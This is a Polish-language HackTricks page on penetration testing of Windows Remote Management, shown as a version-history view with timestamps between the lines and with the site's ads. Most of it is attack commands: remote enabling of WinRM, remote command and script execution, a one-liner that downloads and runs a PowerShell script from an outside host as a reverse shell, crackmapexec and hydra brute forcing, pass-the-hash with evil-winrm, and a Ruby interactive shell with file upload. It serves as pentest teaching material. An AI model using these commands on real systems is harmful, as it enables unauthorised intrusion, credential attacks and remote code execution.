2024-02-11 01:46:25 +00:00
# 5985,5986 - Testowanie penetracyjne WinRM
2022-04-28 16:01:33 +00:00
< details >
2024-04-07 00:09:03 +00:00
< summary > < strong > Nauka hakowania AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2024-01-03 10:42:55 +00:00
2024-04-07 00:09:03 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** , sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
2024-04-07 00:09:03 +00:00
* **Dołącz do** 💬 [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) na GitHubie.
2022-04-28 16:01:33 +00:00
< / details >
2024-04-07 00:09:03 +00:00
< figure > < img src = "../.gitbook/assets/image (377).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-04-07 00:09:03 +00:00
Dołącz do serwera [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ), aby komunikować się z doświadczonymi hakerami i łowcami błędów!
2023-02-27 09:28:45 +00:00
2024-04-07 00:09:03 +00:00
**Spostrzeżenia z Hakerstwa**\
Zajmij się treściami, które zagłębiają się w emocje i wyzwania hakerstwa
2023-02-27 09:28:45 +00:00
2024-04-07 00:09:03 +00:00
**Aktualności z Hakerstwa na Żywo**\
Bądź na bieżąco z szybkim tempem świata hakerstwa dzięki aktualnościom i spostrzeżeniom na żywo
2023-07-14 15:03:41 +00:00
2024-04-07 00:09:03 +00:00
**Najnowsze Ogłoszenia**\
Bądź na bieżąco z najnowszymi programami bug bounty i istotnymi aktualizacjami platform
2023-07-14 15:03:41 +00:00
2024-02-11 01:46:25 +00:00
**Dołącz do nas na** [**Discordzie** ](https://discord.com/invite/N3FrSbmwdy ) i zacznij współpracować z najlepszymi hakerami już dziś!
2022-10-27 23:22:18 +00:00
2022-07-28 09:46:19 +00:00
## WinRM
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
[Windows Remote Management (WinRM) ](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\ ).aspx) jest wyróżniany jako **protokół firmy Microsoft** , który umożliwia **zdalne zarządzanie systemami Windows** poprzez HTTP(S), wykorzystując SOAP w procesie. Jest on zasadniczo zasilany przez WMI, prezentując się jako interfejs oparty na HTTP do operacji WMI.
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
Obecność WinRM na maszynie umożliwia łatwe zdalne zarządzanie za pomocą PowerShell, podobnie jak działa SSH dla innych systemów operacyjnych. Aby sprawdzić, czy WinRM jest aktywny, zaleca się sprawdzenie otwarcia określonych portów:
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
* **5985/tcp (HTTP)**
* **5986/tcp (HTTPS)**
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
Otwarty port z powyższej listy oznacza, że WinRM został skonfigurowany, umożliwiając próby zainicjowania sesji zdalnej.
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
### **Inicjowanie sesji WinRM**
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
Aby skonfigurować PowerShell dla WinRM, używany jest polecenie `Enable-PSRemoting` firmy Microsoft, które ustawia komputer do akceptowania zdalnych poleceń PowerShell. Posiadając podwyższony dostęp do PowerShell, można wykonać następujące polecenia, aby włączyć tę funkcjonalność i określić dowolny host jako zaufany:
2024-02-08 21:36:35 +00:00
```powershell
2024-02-11 01:46:25 +00:00
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
2020-07-15 15:43:14 +00:00
```
2024-04-07 00:09:03 +00:00
To podejście polega na dodaniu symbolu wieloznacznego do konfiguracji `trustedhosts` , krok ten wymaga ostrożnego rozważenia ze względu na jego implikacje. Zauważono również, że konieczne może być zmienienie typu sieci z "Publiczna" na "Praca" na maszynie atakującego.
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
Co więcej, WinRM można **aktywować zdalnie** za pomocą polecenia `wmic` , co jest pokazane poniżej:
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
wmic /node:< REMOTE_HOST > process call create "powershell enable-psremoting -force"
```
2024-04-07 00:09:03 +00:00
Ta metoda umożliwia zdalną konfigurację WinRM, zwiększając elastyczność zarządzania maszynami z systemem Windows z daleka.
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
### Sprawdź, czy skonfigurowano
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
Aby zweryfikować konfigurację maszyny atakującej, używane jest polecenie `Test-WSMan` , aby sprawdzić, czy docelowa maszyna ma poprawnie skonfigurowany WinRM. Wykonując to polecenie, powinieneś otrzymać szczegóły dotyczące wersji protokołu i wsmid, co wskazuje na poprawną konfigurację. Poniżej znajdują się przykłady przedstawiające oczekiwany wynik dla skonfigurowanego celu w porównaniu z nieskonfigurowanym:
2024-02-08 21:36:35 +00:00
2024-04-07 00:09:03 +00:00
* Dla celu, który **jest** poprawnie skonfigurowany, wynik będzie wyglądał podobnie do tego:
2024-02-08 21:36:35 +00:00
```bash
Test-WSMan < target-ip >
```
2024-02-11 01:46:25 +00:00
### Wykonaj polecenie
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Aby zdalnie wykonać polecenie `ipconfig` na maszynie docelowej i wyświetlić jego wynik, wykonaj:
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
2024-04-07 00:09:03 +00:00
![](< .. / . gitbook / assets / image ( 148 ) . png > )
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
Możesz również **wykonać polecenie z bieżącej konsoli PS za pomocą** _**Invoke-Command**_ . Załóżmy, że masz lokalnie funkcję o nazwie _**enumeration**_ i chcesz ją **wykonać na komputerze zdalnym** , możesz to zrobić:
2024-02-08 21:36:35 +00:00
```powershell
2021-08-14 10:42:47 +00:00
Invoke-Command -ComputerName < computername > -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
2020-07-15 15:43:14 +00:00
```
2024-02-11 01:46:25 +00:00
### Wykonaj skrypt
```powershell
Invoke-Command -ComputerName < computername > -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
2021-01-03 00:43:09 +00:00
```
2024-04-07 00:09:03 +00:00
### Uzyskaj odwrotną powłokę
2024-02-11 01:46:25 +00:00
```powershell
Invoke-Command -ComputerName < computername > -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
### Uzyskaj sesję PS
2024-04-07 00:09:03 +00:00
Aby uzyskać interaktywną powłokę PowerShell, użyj `Enter-PSSession` :
2022-09-26 12:02:10 +00:00
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
2020-07-15 15:43:14 +00:00
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
2022-10-30 16:20:17 +00:00
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
2024-02-11 01:46:25 +00:00
# Save session in var
2022-10-30 16:20:17 +00:00
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
2020-07-15 15:43:14 +00:00
```
2024-04-07 00:09:03 +00:00
![](< .. / . gitbook / assets / image ( 1006 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
**Sesja zostanie uruchomiona w nowym procesie (wsmprovhost) wewnątrz "ofiary"**
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
### **Wymuszanie otwarcia WinRM**
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
Aby korzystać z PS Remoting i WinRM, ale komputer nie jest skonfigurowany, możesz go włączyć za pomocą:
2024-02-08 21:36:35 +00:00
```powershell
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
2020-07-15 15:43:14 +00:00
```
2024-02-11 01:46:25 +00:00
### Zapisywanie i przywracanie sesji
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
To **nie zadziała** , jeśli **język** jest **ograniczony** na zdalnym komputerze.
2024-02-08 21:36:35 +00:00
```powershell
2022-09-26 12:02:10 +00:00
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
2020-07-15 15:43:14 +00:00
#You can save a session inside a variable
2022-09-25 22:00:52 +00:00
$sess1 = New-PSSession -ComputerName < computername > [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
2020-07-15 15:43:14 +00:00
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
2024-04-07 00:09:03 +00:00
Wewnątrz tych sesji możesz ładować skrypty PS za pomocą _Invoke-Command_
2024-02-08 21:36:35 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
2024-02-11 01:46:25 +00:00
### Błędy
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Jeśli napotkasz następujący błąd:
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
`enter-pssession : Połączenie z serwerem zdalnym 10.10.10.175 nie powiodło się z następującą wiadomością o błędzie : Klient WinRM nie może przetworzyć żądania. Jeśli schemat uwierzytelniania różni się od Kerberos, lub jeśli komputer klienta nie jest dołączony do domeny, należy użyć transportu HTTPS lub dodać maszynę docelową do ustawienia konfiguracji TrustedHosts. Użyj winrm.cmd, aby skonfigurować TrustedHosts. Należy zauważyć, że komputery na liście TrustedHosts mogą nie być uwierzytelnione. Możesz uzyskać więcej informacji, wykonując następujące polecenie: winrm help config. Aby uzyskać więcej informacji, zobacz temat Pomoc dotyczącą rozwiązywania problemów zdalnych.`
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Spróbuj na kliencie (informacje z [tutaj ](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server )):
2020-07-15 15:43:14 +00:00
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
2024-04-07 00:09:03 +00:00
< figure > < img src = "../.gitbook/assets/image (377).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-04-07 00:09:03 +00:00
Dołącz do serwera [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ), aby komunikować się z doświadczonymi hakerami i łowcami luk za pomocą bug bounty!
2022-10-27 23:22:18 +00:00
2024-02-11 01:46:25 +00:00
**Wgląd w Hacking**\
2024-04-07 00:09:03 +00:00
Zajmij się treściami, które zagłębiają się w emocje i wyzwania hackowania
2023-02-27 09:28:45 +00:00
2024-04-07 00:09:03 +00:00
**Aktualności na Żywo z Hackingu**\
Bądź na bieżąco z szybkim tempem świata hackowania dzięki aktualnościom i wglądom na żywo
2023-07-14 15:03:41 +00:00
2024-02-11 01:46:25 +00:00
**Najnowsze Ogłoszenia**\
2024-04-07 00:09:03 +00:00
Bądź na bieżąco z najnowszymi bug bounty i istotnymi aktualizacjami platformy
2022-10-27 23:22:18 +00:00
2024-02-11 01:46:25 +00:00
**Dołącz do nas na** [**Discordzie** ](https://discord.com/invite/N3FrSbmwdy ) i zacznij współpracować z najlepszymi hakerami już dziś!
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
## Połączenie z WinRM w systemie Linux
2020-09-20 21:44:41 +00:00
2024-02-11 01:46:25 +00:00
### Atak Brute Force
2020-09-20 21:41:33 +00:00
2024-04-07 00:09:03 +00:00
Bądź ostrożny, próba siłowa na WinRM może zablokować użytkowników.
2020-09-20 21:41:33 +00:00
```ruby
#Brute force
crackmapexec winrm < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
#Just check a pair of credentials
2022-05-01 12:49:36 +00:00
# Username + Password + CMD command execution
2020-09-20 21:44:41 +00:00
crackmapexec winrm < IP > -d < Domain Name > -u < username > -p < password > -x "whoami"
2022-05-01 12:49:36 +00:00
# Username + Hash + PS command execution
2020-09-20 21:44:41 +00:00
crackmapexec winrm < IP > -d < Domain Name > -u < username > -H < HASH > -X '$PSVersionTable'
2020-09-20 21:41:33 +00:00
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```
2024-04-07 00:09:03 +00:00
### Korzystanie z evil-winrm
2024-02-11 01:46:25 +00:00
```ruby
gem install evil-winrm
```
Przeczytaj **dokumentację** na jego githubie: [https://github.com/Hackplayers/evil-winrm ](https://github.com/Hackplayers/evil-winrm )
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i < IP > /< Domain >
```
2024-04-07 00:09:03 +00:00
Aby użyć evil-winrm do połączenia z adresem **IPv6** , utwórz wpis wewnątrz _**/etc/hosts**_ ustawiając **nazwę domeny** na adres IPv6 i połącz się z tą domeną.
2024-02-11 01:46:25 +00:00
2024-04-07 00:09:03 +00:00
### Przekazanie hasha za pomocą evil-winrm
2020-07-15 15:43:14 +00:00
```ruby
evil-winrm -u < username > -H < Hash > -i < IP >
```
2024-04-07 00:09:03 +00:00
### Korzystanie z maszyny PS-docker
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
2024-04-07 00:09:03 +00:00
### Korzystanie z skryptu w języku Ruby
2020-07-15 15:43:14 +00:00
2024-04-07 00:09:03 +00:00
**Kod wyodrębniony stąd:** [**https://alamot.github.io/winrm\_shell/** ](https://alamot.github.io/winrm\_shell/ )
2020-07-15 15:43:14 +00:00
```ruby
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
2024-02-05 02:28:59 +00:00
# https://alamot.github.io/winrm_shell/
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
2020-07-15 15:43:14 +00:00
)
class String
2024-02-11 01:46:25 +00:00
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
2020-07-15 15:43:14 +00:00
end
command=""
file_manager = WinRM::FS::FileManager.new(conn)
conn.shell(:powershell) do |shell|
2024-02-11 01:46:25 +00:00
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK` n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
2020-07-15 15:43:14 +00:00
end
```
2022-07-28 09:46:19 +00:00
## Shodan
2020-10-05 21:51:08 +00:00
* `port:5985 Microsoft-HTTPAPI`
2024-04-07 00:09:03 +00:00
## References
2022-10-27 23:22:18 +00:00
* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ ](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/ )
2024-04-07 00:09:03 +00:00
## HackTricks Automatyczne Komendy
2021-10-18 11:21:18 +00:00
```
2021-08-12 12:53:13 +00:00
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out
2021-08-15 17:09:57 +00:00
Entry_1:
2024-02-11 01:46:25 +00:00
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.
2021-08-15 17:09:57 +00:00
2024-02-11 01:46:25 +00:00
sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘ MySuperSecr3tPass123!’
2021-08-15 17:09:57 +00:00
2024-02-11 01:46:25 +00:00
https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/
2021-08-15 17:09:57 +00:00
2024-02-11 01:46:25 +00:00
ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory or -s to upload scripts (sherlock)
menu
invoke-binary `tab`
2021-08-15 17:09:57 +00:00
2024-02-11 01:46:25 +00:00
#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))
2021-08-15 17:09:57 +00:00
2024-02-11 01:46:25 +00:00
https://book.hacktricks.xyz/pentesting/pentesting-winrm
2021-09-25 16:33:43 +00:00
2021-09-13 15:49:25 +00:00
Entry_2:
2024-02-11 01:46:25 +00:00
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
2021-08-15 22:19:51 +00:00
```
2024-04-07 00:09:03 +00:00
2023-07-14 15:03:41 +00:00
2024-04-07 00:09:03 +00:00
< figure > < img src = "../.gitbook/assets/image (377).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-02-27 09:28:45 +00:00
2024-04-07 00:09:03 +00:00
Dołącz do serwera [**HackenProof Discord** ](https://discord.com/invite/N3FrSbmwdy ), aby komunikować się z doświadczonymi hakerami i łowcami luk za nagrody!
2022-10-27 23:22:18 +00:00
2024-04-07 00:09:03 +00:00
**Wgląd w Hacking**\
Zanurz się w treściach, które zgłębiają emocje i wyzwania związane z hakerstwem
**Aktualności z Hackingu na Żywo**\
Bądź na bieżąco z szybkim światem hakerstwa dzięki aktualnościom i wglądom na żywo
2023-02-27 09:28:45 +00:00
2024-04-07 00:09:03 +00:00
**Najnowsze Ogłoszenia**\
Bądź na bieżąco z najnowszymi programami nagród za znalezienie luk i istotnymi aktualizacjami platform
2023-02-27 09:28:45 +00:00
2024-02-11 01:46:25 +00:00
**Dołącz do nas na** [**Discordzie** ](https://discord.com/invite/N3FrSbmwdy ) i zacznij współpracować z najlepszymi hakerami już dziś!
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-04-07 00:09:03 +00:00
< summary > < strong > Nauka hakerstwa AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2024-01-03 10:42:55 +00:00
2024-04-07 00:09:03 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** , sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
2024-04-07 00:09:03 +00:00
* **Dołącz do** 💬 [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) na githubie.
2022-04-28 16:01:33 +00:00
< / details >